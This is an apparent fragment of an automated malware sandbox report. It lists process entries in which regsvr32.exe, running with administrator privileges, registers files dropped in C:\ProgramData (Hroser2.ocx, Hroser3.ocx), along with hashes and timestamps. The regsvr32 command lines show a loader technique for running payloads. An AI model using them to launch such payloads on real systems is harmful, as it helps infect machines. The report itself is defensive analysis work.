                                                                                                                                                  Imagebase:0x3e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:09:20:20
                                                                                                                                                  Start date:16/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser2.ocx
                                                                                                                                                  Imagebase:0x3e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:09:20:20
                                                                                                                                                  Start date:16/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser3.ocx
                                                                                                                                                  Imagebase:0x3e0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  No disassembly